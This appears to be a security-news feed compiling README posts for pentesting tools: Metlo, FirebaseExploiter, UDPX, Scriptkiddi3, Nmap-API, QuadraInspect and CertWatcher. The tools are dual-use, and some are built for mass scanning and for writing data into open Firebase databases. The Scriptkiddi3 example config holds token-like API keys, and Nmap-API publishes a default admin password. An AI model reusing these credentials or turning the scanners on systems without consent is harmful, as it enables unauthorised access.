Although we highly recommend Metlo Cloud, if you're a large company or need an air-gapped system you can self host Metlo as well! Create an account on https://my.metlo.com and follow the instructions on our docs here to setup Metlo in your own Cloud environment.

If you want to deploy our Open Source product we have instructions for AWS, GCP, Azure and Docker.

You can also join our Discord community if you need help or just want to chat!

Features

  • Endpoint Discovery - Metlo scans network traffic and creates an inventory of every single endpoint in your API.
  • Sensitive Data Scannning - Each endpoint is scanned for PII data and given a risk score.
  • Vulnerability Discovery - Get Alerts for issues like unauthenticated endpoints returning sensitive data, No HSTS headers, PII data in URL params, Open API Spec Diffs and more
  • API Security Testing - Build security tests directly in Metlo. Autogenerate tests for OWASP Top 10 vulns like BOLA, Broken Authentication, SQL Injection and more.
  • CI/CD Integration - Integrate with your CI/CD to find issues in development and staging.
  • Attack Detection - Our ML Algorithms build a model for baseline API behavior. Any deviation from this baseline is surfaced to your security team as soon as possible.
  • Attack Context - Metlo’s UI gives you full context around any attack to help quickly fix the vulnerability.

Testing

For tests that we can't autogenerate, our built in testing framework helps you get to 100% Security Coverage on your highest risk APIs. You can build tests in a yaml format to make sure your API is working as intendend.

For example the following test checks for broken authentication:

id: test-payment-processor-metlo.com-user-billing

meta:
name: test-payment-processor.metlo.com/user/billing Test Auth
severity: CRITICAL
tags:
- BROKEN_AUTHENTICATION

test:
- request:
method: POST
url: https://test-payment-processor.metlo.com/user/billing
headers:
- name: Content-Type
value: application/json
- name: Authorization
value: ...
data: |-
{ "ccn": "...", "cc_exp": "...", "cc_code": "..." }
assert:
- key: resp.status
value: 200
- request:
method: POST
url: https://test-payment-processor.metlo.com/user/billing
headers:
- name: Content-Type
value: application/json
data: |-
{ "ccn": "...", "cc_exp": "...", "cc_code": "..." }
assert:
- key: resp.s tatus
value: [ 401, 403 ]

You can see more information on our docs.

Why Metlo?

Most businesses have adopted public facing APIs to power their websites and apps. This has dramatically increased the attack surface for your business. There’s been a 200% increase in API security breaches in just the last year with the APIs of companies like Uber, Meta, Experian and Just Dial leaking millions of records. It's obvious that tools are needed to help security teams make APIs more secure but there's no great solution on the market.

Some solutions require you to go through sales calls to even try the product while others have you to send all your API traffic to their own cloud. Metlo is the first Open Source API security platform that you can self host, and get started for free right away!

We're Hiring!

We would love for you to come help us make Metlo better. Come join us at Metlo!

Open-source vs. paid

This repo is entirely MIT licensed. Features like user management, user roles and attack protection require an enterprise license. Contact us for more information.

Development

Checkout our development guide for more info on how to develop Metlo locally.



FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable


FirebaseExploiter is a vulnerability discovery tool that discovers Firebase Database which are open and can be exploitable. Primarily built for mass hunting bug bounties and for penetration testing.

Features

  • Mass vulnerability scanning from list of hosts
  • Custom JSON data in exploit.json to upload during exploit
  • Custom URI path for exploit

Usage

This will display help for the CLI tool. Here are all the required arguments it supports.

Installation

FirebaseExploiter was built using go1.19. Make sure you use latest version of Go to install successfully. Run the following command to install the latest version:

go install -v github.com/securebinary/firebaseExploiter@latest

Running FirebaseExploiter

To scan a specific domain to check for Insecure Firebase DB.

To exploit a Firebase DB to write your own JSON document in it.

Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.

Checking the exploited URL to verify the vulnerability.

Adding custom path for exploiting Firebase DBs.

Mass scanning for Insecure Firebase Databases from list of target hosts.

Exploiting vulnerable Firebase DBs from the list of target hosts.

License

FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contribution are welcome.


UDPX - Fast A nd Lightweight, UDPX Is A Single-Packet UDP Scanner Written In Go That Supports The Discovery Of Over 45 Services With The Ability To Add Custom Ones


Fast and lightweight, UDPX is a single-packet UDP scanner written in Go that supports the discovery of over 45 services with the ability to add custom ones. It is easy to use and portable, and can be run on Linux, Mac OS, and Windows. Unlike internet-wide scanners like zgrab2 and zmap, UDPX is designed for portability and ease of use.

  • It is fast. It can scan whole /16 network in ~20 seconds for a single service.
  • You don't need to instal libpcap or any other dependencies.
  • Can run on Linux, Mac Os, Windows. Or your Nethunter if you built it for Arm.
  • Customizable. You can add your probes and test for even more protocols.
  • Stores results in JSONL format.
  • Scans also domain names.

How it works

Scanning UDP ports is very different than scanning TCP - you may, or may not get any result back from probing an UDP port as UDP is a connectionless protocol. UDPX implements a single-packet based approach. A protocol-specific packet is sent to the defined service (port) and waits for a response. The limit is set to 500 ms by default and can be changed by -w flag. If the service sends a packet back within this time, it is certain that it is indeed listening on that port and is reported as open.

A typical technique is to send 0 byte UDP packets to each port on the target machine. If we receive an "ICMP Port Unreachable" message, then the port is closed. If an UDP response is received to the probe (unusual), the port is open. If we get no response at all, the state is open or filtered, meaning that the port is either open or packet filters are blocking the communication. This method is not implemented as there is no added value (UDPX tests only for specific protocols).

Usage

Concurrency: By default, concurrency is set to 32 connections only (so you don't crash anything). If you have a lot of hosts to scan, you can set it to 128 or 256 connections. Based on your hardware, connection stability, and ulimit (on *nix), you can run 512 or more concurrent connections, but this is not recommended.

To scan a single IP:

udpx -t 1.1.1.1

To scan a CIDR with maximum of 128 connections and timeout of 1000 ms:

udpx -t 1.2.3.4/24 -c 128 -w 1000

To scan targets from file with maximum of 128 connections for only specific service:

udpx -tf targets.txt -c 128 -s ipmi

Target can be:

  • IP address
  • CIDR
  • Domain

IPv6 is supported.

If you want to store the results, use flag -o [filename]. Output is in JSONL format, as can be seen bellow:

{"address":"45.33.32.156","hostname":"scanme.nmap.org","port":123,"service":"ntp","response_data":"JAME6QAAAEoAAA56LU9vp+d2ZPwOYIyDxU8jS3GxUvM="}

Options


__ ______ ____ _ __
/ / / / __ \/ __ \ |/ /
/ / / / / / / /_/ / /
/ /_/ / /_/ / ____/ |
\____/_____/_/ /_/|_|
v1.0.2-beta, by @nullt3r

Usage of ./udpx-linux-amd64:
-c int
Maximum number of concurrent connections (default 32)
-nr
Do not randomize addresses
-o string
Output file to write results
-s string
Scan only for a specific service, one of: ard, bacnet, bacnet_rpm, chargen, citrix, coap, db, db, digi1, digi2, digi3, dns, ipmi, ldap, mdns, memcache, mssql, nat_port_mapping, natpmp, netbios, netis, ntp, ntp_monlist, openvpn, pca_nq, pca_st, pcanywhere, portmap, qotd, rdp, ripv, sentinel, sip, snmp1, snmp2, snmp3, ssdp, tftp, ubiquiti, ubiquiti_discovery_v1, ubiquiti_discovery_v2, upnp, valve, wdbrpc, wsd, wsd_malformed, xdmcp, kerberos, ike
-sp
Show received packets (only first 32 bytes)
-t string
IP/CIDR to scan
-tf string
File containing IPs/CIDRs to scan
-w int
Maximum time to wait for a response (socket timeout) in ms (default 500)

Building

You can grab prebuilt binaries in the release section. If you want to build UDPX from source, follow these steps:

From git:

git clone https://github.com/nullt3r/udpx
cd udpx
go build ./cmd/udpx

You can find the binary in the current directory.

Or via go:

go install -v github.com/nullt3r/udpx/cmd/udpx@latest

After that, you can find the binary in $HOME/go/bin/udpx. If you want, move binary to /usr/local/bin/ so you can call it directly.

Supported services

The UDPX supports more then 45 services. The most interesting are:

  • ipmi
  • snmp
  • ike
  • tftp
  • openvpn
  • kerberos
  • ldap

The complete list of supported services:

  • ard
  • bacnet
  • bacnet_rpm
  • chargen
  • citrix
  • coap
  • db
  • db
  • digi1
  • digi2
  • digi3
  • dns
  • ipmi
  • ldap
  • mdns
  • memcache
  • mssql
  • nat_port_mapping
  • natpmp
  • netbios
  • netis
  • ntp
  • ntp_monlist
  • openvpn
  • pca_nq
  • pca_st
  • pcanywhere
  • portmap
  • qotd
  • rdp
  • ripv
  • sentinel
  • sip
  • snmp1
  • snmp2
  • snmp3
  • ssdp
  • tftp
  • ubiquiti
  • ubiquiti_discovery_v1
  • ubiquiti_discovery_v2
  • upnp
  • valve
  • wdbrpc
  • wsd
  • wsd_malformed
  • xdmcp
  • kerberos
  • ike

How to add your own probe?

Please send a feature request with protocol name and port and I will make it happen. Or add it on your own, the file pkg/probes/probes.go contains all available payloads. Specify the protocol name, port and packet data (hex-encoded).

{
Name: "ike",
Payloads: []string{"5b5e64c03e99b51100000000000000000110020000000000000001500000013400000001000000010000012801010008030000240101"},
Port: []int{500, 4500},
},

Credits

Disclaimer

I am not responsible for any damages. You are responsible for your own actions. Scanning or attacking targets without prior mutual consent can be illegal.

License

UDPX is distributed under MIT License.



Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

How it works β€’ Installation β€’ Usage β€’ MODES β€’ For Developers β€’ Credits

Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

[Thanks ChatGPT for the Description]


How it Works ?

This tool mainly performs 3 tasks

  1. Effective Subdomain Enumeration from Various Tools
  2. Get URLs with open HTTP and HTTPS service.
  3. Run a Nuclei and other scans on previous output So basically, this is an autmation script for your initial recon in bugbounty

Install SCRIPTKIDDI3

SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirments-

git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh

Usage

scriptkiddi3 -h

This will display help for the tool. Here are all the switches it supports.

Vulnerability Detection with Nuclei, and Scan for SUBDOMAINE TAKEOVER [FLAGS:] [TARGET:] -d, --domain target domain to scan [CONFIG:] -c, --config path of your configuration file for subfinder [HELP:] -h, --help to get help menu [UPDATE:] -u, --update to update tool [Examples:] Run scriptkiddi3 in full Exploitation mode scriptkiddi3 -m EXP -d target.com Use your own CONFIG file for subfinder scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode scriptkiddi3 -m SUB -d target.com Run scriptkiddi3 in URL ENUMERATION mode scriptkiddi3 -m SUB -d target.com " dir="auto">
[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.


[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


Feature of EXPLOI mode : subdomain enumaration, URL Enumeration,
Vulnerability Detection with Nuclei,
an d Scan for SUBDOMAINE TAKEOVER

[FLAGS:]
[TARGET:] -d, --domain target domain to scan

[CONFIG:] -c, --config path of your configuration file for subfinder

[HELP:] -h, --help to get help menu

[UPDATE:] -u, --update to update tool

[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com


Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com


Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m SUB -d target.com

MODES

1. FULL EXPLOITATION MODE

Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

  scriptkiddi3 -m EXP -d target.com

FULL EXPLOITATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • Effective URL Enumeration ( HTTP and HTTPs service )
  • Run Vulnerability Detection with Nuclei
  • Subdomain Takeover Test on previous results

2. SUBDOMAIN ENUMERATION MODE

Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

  scriptkiddi3 -m SUB -d target.com

SUBDOMAIN ENUMERATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • You can use this mode if you only want to get subdomains from this tool or we can say Automation of Subdmain Enumeration by different tools

3. URL ENUMERATION MODE

Run scriptkiddi3 in URL ENUMERATION MODE

  scriptkiddi3 -m URL -d target.com

URL ENUMERATION MODE contains following functions

  • Same Feature as SUBDOMAIN ENUMERATION MODE but also identifies HTTP or HTTPS service

Using your own CONFIG File for subfinder

  scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

You can also provie your own CONDIF file with your API Keys for subdomain enumeration with subfinder

Updating tool to latest version You can run following command to update tool

  scriptkiddi3 -u

An Example of config.yaml

binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password

For Developers

If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

If you have any other queries, you can always contact me on Twitter(thecyberneh)

Credits

I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy


Uses python3.10, Debian, python-Nmap, and flask framework to create a Nmap API that can do scans with a good speed online and is easy to deploy.

This is a implementation for our college PCL project which is still under development and constantly updating.


API Reference

Get all items

  GET /api/p1/{username}:{password}/{target}
GET /api/p2/{username}:{password}/{target}
GET /api/p3/{username}:{password}/{target}
GET /api/p4/{username}:{password}/{target}
GET /api/p5/{username}:{password}/{target}
Parameter Type Description
username string Required. username of the current user
password string Required. current user password
target string Required. The target Hostname and IP

Get item

  GET /api/p1/
GET /api/p2/
GET /api/p3/
GET /api/p4/
GET /api/p5/
Parameter Return data Description Nmap Command
p1 json Effective Scan -Pn -sV -T4 -O -F
p2 json Simple Scan -Pn -T4 -A -v
p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
p4 json Partial Intense Scan -Pn -p- -T4 -A -v
p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

Auth and User management

  POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
  • make sure you use the ADMIN CREDS MENTIONED BELOW
Parameter Type Description
admin-username String Admin username
admin-passwd String Admin password
id String Id for newly added user
username String Username of the newly added user
passwd String Password of the newly added user
t-username String Target username
t-user-id String Target userID
t-userpass String Target users password
new-t-username String New username for the target
new-t-user-id String New userID for the target
new-t-userpass String New password for the target

DEFAULT CREDENTIALS

ADMINISTRATOR : zAp6_oO~t428)@,



QuadraInspect - Android Framework That Integrates AndroPass, APKUtil, And MobFS, Providing A Powerful Tool For Analyzing The Security Of Android Applications


The security of mobile devices has become a critical concern due to the increasing amount of sensitive data being stored on them. With the rise of Android OS as the most popular mobile platform, the need for effective tools to assess its security has also increased. In response to this need, a new Android framework has emerged that combines three powerful tools - AndroPass, APKUtil, RMS, and MobFS - to conduct comprehensive vulnerability analysis of Android applications. This framework is known as QuadraInspect.

QuadraInspect is an Android framework that integrates AndroPass, APKUtil, RMS and MobFS, providing a powerful tool for analyzing the security of Android applications. AndroPass is a tool that focuses on analyzing the security of Android applications' authentication and authorization mechanisms, while APKUtil is a tool that extracts valuable information from an APK file. Lastly, MobFS and RMS facilitates the analysis of an application's filesystem by mounting its storage in a virtual environment.

By combining these three tools, QuadraInspect provides a comprehensive approach to vulnerability analysis of Android applications. This framework can be used by developers, security researchers, and penetration testers to assess the security of their own or third-party applications. QuadraInspect provides a unified interface for all three tools, making it easier to use and reducing the time required to conduct comprehensive vulnerability analysis. Ultimately, this framework aims to increase the security of Android applications and protect users' sensitive data from potential threats.


Requirements

  • Windows, Linux or Mac
  • NodeJs installed
  • Python 3 installed
  • OpenSSL-3 installed
  • Wkhtmltopdf installed

Installation

To install the tools you need to: First : git clone https://github.com/morpheuslord/QuadraInspect

Second Open a Administrative cmd or powershell (for Mobfs setup) and run : pip install -r requirements.txt && python3 main.py

Third : Once QuadraInspect loads run this command QuadraInspect Main>> : START install_tools

The tools will be downloaded to the tools directory and also the setup.py and setup.bat commands will run automatically for the complete installation.

Usage

Each module has a help function so that the commands and the discriptions are detailed and can be altered for operation.

These are the key points that must be addressed for smooth working:

  • The APK file or target must be declared before starting any attack
  • The Attacks are seperate entities combined via this framework doing research on how to use them is recommended.
  • The APK file can be ether declared ether using args or using SET target withing the tool.
  • The target APK file must be placed in the target folder as all the tool searches for the target file with that folder.

Modes

There are 2 modes:

|
└─> F mode
└─> A mode

F mode

The f mode is a mode where you get the active interface for using the interactive vaerion of the framework with the prompt, etc.

F mode is the normal mode and can be used easily

A mode

A mode or argumentative mode takes the input via arguments and runs the commands without any intervention by the user this is limited to the main menu in the future i am planning to extend this feature to even the encorporated codes.

python main.py --target <APK_file> --mode a --command install_tools/tools_name/apkleaks/mobfs/rms/apkleaks

Main Module

the main menu of the entire tool has these options and commands:

Command Discription
SET target SET the name of the targetfile
START install_tools If not installed this will install the tools
LIST tools_name List out the Tools Intigrated
START apkleaks Use APKLeaks tool
START mobfs Use MOBfs for dynamic and static analysis
START andropass Use AndroPass APK analizer
help Display help menu
SHOW banner Display banner
quit Quit the program

As mentioned above the target must be set before any tool is used.

Apkleaks menu

The APKLeaks menu is also really straight forward and only a few things to consider:

  • The options SET output and SET json-out takes file names not the actual files it creates an output in the result directory.
  • The SET pattern option takes a name of a json pattern file. The JSON file must be located in the pattern directory
OPTION SET Value
SET output Output for the scan data file name
SET arguments Additional Disassembly arguments
SET json-out JSON output file name
SET pattern The pre-searching pattern for secrets
help Displays help menu
return Return to main menu
quit Quit the tool

Mobfs

Mobfs is pritty straight forward only the port number must be taken care of which is by default on port 5000 you just need to start the program and connect to it on 127.0.0.1:5000 over your browser.

AndroPass

AndroPass is also really straight forward it just takes the file as input and does its job without any other inputs.

Architecture:

The APK analysis framework will follow a modular architecture, similar to Metasploit. It will consist of the following modules:

  • Core module: The core module will provide the basic functionality of the framework, such as command-line interface, input/output handling, and logging.
  • Static analysis module: The static analysis module will be responsible for analyzing the structure and content of APK files, such as the manifest file, resources, and code.
  • Dynamic analysis module: The dynamic analysis module will be responsible for analyzing the behavior of APK files, such as network traffic, API calls, and file system interactions.
  • Reverse engineering module: The reverse engineering module will be responsible for decompiling and analyzing the source code of APK files.
  • Vulnerability testing module: The vulnerability testing module will be responsible for testing the security of APK files, such as identifying vulnerabilities and exploits.

Adding more

Currentluy there only 3 but if wanted people can add more tools to this these are the things to be considered:

  • Installer function
  • Seperate tool function
  • Main function

Installer Function

  • Must edit in the config/installer.py
  • The things to consider in the installer is the link for the repository.
  • keep the cloner and the directory in a try-except condition to avoide errors.
  • choose an appropriate command for further installation

Seperate tool function

  • Must edit in the config/mobfs.py , config/androp.py, config/apkleaks.py
  • Write a new function for the specific tool
  • File handeling is up to you I recommend passing the file name as an argument and then using the name to locate the file using the subprocess function
  • the tools must also recommended to be in a try-except condition to avoide unwanted errors.

Main Function

  • A new case must be added to the switch function to act as a main function holder
  • the help menu listing and commands are up to your requirements and comfort

If wanted you could do your upgrades and add it to this repository for more people to use kind of growing this tool.



Certwatcher - Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL


CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps detect and analyze websites using regular expression patterns and is designed for ease of use by security professionals and researchers.


Certwatcher continuously monitors the certificate data stream and checks for patterns or malicious activity. Certwatcher can also be customized to detect specific phishing, exposed tokens, secret api key patterns using regular expressions defined by YAML templates.

Get Started

Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

Useful Links

Contribution

If you want to contribute to this project, follow the steps below:

  • Fork this repository.
  • Create a new branch with your feature: git checkout -b my-new-feature
  • Make changes and commit the changes: git commit -m 'Adding a new feature'
  • Push to the original branch: git push origin my-new-feature
  • Open a pull request.

Authors



CertWatcher - A Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL


CertWatcher is a tool for capture and tracking certificate transparency logs, using YAML templates. The tool helps to detect and analyze phishing websites and regular expression patterns, and is designed to make it easy to use for security professionals and researchers.



Certwatcher continuously monitors the certificate data stream and checks for suspicious patterns or malicious activity. Certwatcher can also be customized to detect specific phishing patterns and combat the spread of malicious websites.

Get Started

Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

Useful Links

Contribution

If you want to contribute to this project, follow the steps below:

  • Fork this repository.
  • Create a new branch with your feature: git checkout -b my-new-feature
  • Make changes and commit the changes: git commit -m 'Adding a new feature'
  • Push to the original branch: git push origin my-new-feature
  • Open a pull request.

Authors



Top 5 Critical CVEs Vulnerability from 2019 That Every CISO Must Patch Before He Gets Fired !

The number of vulnerabilities continues to increase so much that the technical teams in charge of the patch management find themselves drowning in a myriad of critical and urgent tasks. Therefore we have taken the time to review the profile of the most critical vulnerabilities & issues that impacted year 2019. After this frenzy during [&hellip
❌